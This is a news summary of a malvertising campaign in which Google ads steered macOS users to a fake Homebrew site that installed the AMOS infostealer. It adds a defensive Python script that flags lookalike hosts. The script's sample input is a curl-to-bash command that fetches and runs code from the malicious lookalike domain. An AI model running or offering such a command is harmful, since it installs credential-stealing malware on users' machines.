Malvertising Attack Tricks macOS Users with Fake Homebrew Site, Installs AMOS Infostealer
January 22, 2025
To protect against similar attacks, users should verify website URLs and avoid installing software from unfamiliar sources.
A recent malvertising campaign has targeted macOS users by leading them to a fraudulent Homebrew site, 'brewe.sh', which closely resembles the legitimate site 'brew.sh'.
AMOS is a powerful infostealer designed to capture sensitive information, including login credentials and cryptocurrency details.
Security researchers have been warning about AMOS for several months, highlighting its subscription model that costs cybercriminals $1,000 per month.
Mike McQuaid, Homebrew's project leader, criticized Google for its inadequate oversight in preventing such scams, despite the removal of the malicious ad.
Victims of this scam are misled into executing a command that appears to install Homebrew, but instead, they inadvertently download the AMOS malware.
Users who clicked on the malicious ad were tricked into downloading AmosStealer, which is specifically designed for macOS.
Cybersecurity experts recommend that users avoid sponsored links and instead bookmark official websites to mitigate risks associated with such attacks.
Although Google has taken down the harmful ads, questions remain about how the threat actors managed to bypass Google's crawlers to display the fake Homebrew URL.
The campaign utilized Google advertisements to promote the fraudulent Homebrew site, taking advantage of the platform's vast reach.
Malwarebytes reported that thousands of Google customers worldwide might have been affected by this broader malvertising campaign.
Following the alert about the campaign, McQuaid confirmed that the malicious operation has been taken down, but he expressed concerns about the frequency of these incidents.
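One way to act on the "verify website URLs" advice before running a pasted install command, shown as an added example that is not from the sources or from the Homebrew project: it extracts every URL host from the command and flags hosts that are a small edit distance from a trusted one, as 'brewe.sh' is from 'brew.sh'. The allowlist contents, the distance threshold of 2, the function names and the sample command path are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: an allowlist the reader maintains. brew.sh is the legitimate site
# named in the article; the GitHub host is where its install script is served.
TRUSTED_HOSTS = {"brew.sh", "raw.githubusercontent.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)

def osa_distance(a: str, b: str) -> int:
    """Edit distance counting insert, delete, substitute and adjacent swap."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = a[i - 1] != b[j - 1]
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]

def classify_host(host: str, max_distance: int = 2) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for one hostname."""
    host = host.lower().rstrip(".")
    if any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS):
        return "trusted"
    # Compare both the full host and its last two labels, so www.brewe.sh
    # is still measured against brew.sh.
    candidates = {host, ".".join(host.split(".")[-2:])}
    if any(osa_distance(c, t) <= max_distance for c in candidates for t in TRUSTED_HOSTS):
        return "lookalike"
    return "unknown"

def review_command(text: str) -> dict:
    """Map every URL host found in a pasted command to its verdict."""
    hosts = (urlsplit(u).hostname for u in URL_RE.findall(text))
    return {h: classify_host(h) for h in hosts if h}

if __name__ == "__main__":
    # Constructed sample input; the path is a placeholder, not from the article.
    pasted = '/bin/bash -c "$(curl -fsSL https://brewe.sh/constructed-path)"'
    for host, verdict in review_command(pasted).items():
        print(f"{host}: {verdict}")
```

A "lookalike" verdict means the command should not be run until the host is checked against a bookmarked official site; "unknown" only means the host is not on the allowlist.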
Summary based on 3 sources
Sources
TechRadar pro • Jan 22, 2025
Mac users targeted with new malware, so be on your guard
AppleInsider • Jan 22, 2025
Cyber criminals are opening an old bag of tricks to attack Mac users